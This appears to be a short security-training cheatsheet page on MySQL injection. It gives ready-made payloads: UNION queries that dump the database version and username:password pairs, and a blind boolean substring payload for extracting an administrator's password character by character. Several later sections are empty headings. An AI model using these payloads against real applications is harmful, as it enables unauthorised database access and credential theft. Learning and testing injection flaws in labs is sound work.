search
GithubTwitterTryHackMeHackTheBox

Basic MySQL Injection Cheatsheet

hashtag
Retreaving Database version

SELECT @@version

UNION Statement Context

' UNION SELECT NULL, @@version -- -

Note: In UNION Statement we have to match the number of columns of first select statement so that's why we use one NULL in the payload.

hashtag
String Concatenation

SELECT CONCAT(username, password) FROM Users

UNION Statement Context

' UNION SELECT NULL,CONCAT(username, ':', password) FROM Users-- -

hashtag
Substring

SELECT SUBSTRING(password, 2,1) FROM users where username = 'administrator'

Note: In the above query we only extract second character of Administrator users password with the length of one that's mean only one character at a time. SUBSTRING Function has a syntax like this SUBSTRING(string , start position, total length)

In a blind SQLi Context where we have some difference in response

' AND SELECT SUBSTRING((SELECT Password FROM Users Where Username = 'Administrator'),1,1) = FUZZ

Note: Suppost we have a blind SQLi in which we have some difference in response like Content Length or any wellcome back message of successfull login etc. Using above query we add a True or False condition using AND keyword so when Password of the Administrator user have a character equal to or FUZZ character then they shows us a welcome back message or different content length otherwise they didn't show us that. In FUZZ we have a dictionary that contain all alpha-numeric characters and symbols.

hashtag
Conditional Errors

In SQLi Context

hashtag
Time Delays

Blind SQLi Context

hashtag
DNS Lookups

SQLi Context

hashtag
Database Contents

List all the tables

USING UNION Statement

List all the columns in a Table

Using UNION Statement

PreviousBasic PostgreSQL injection CheatsheetNextBasic Oracle SQLi Cheatsheet

Last updated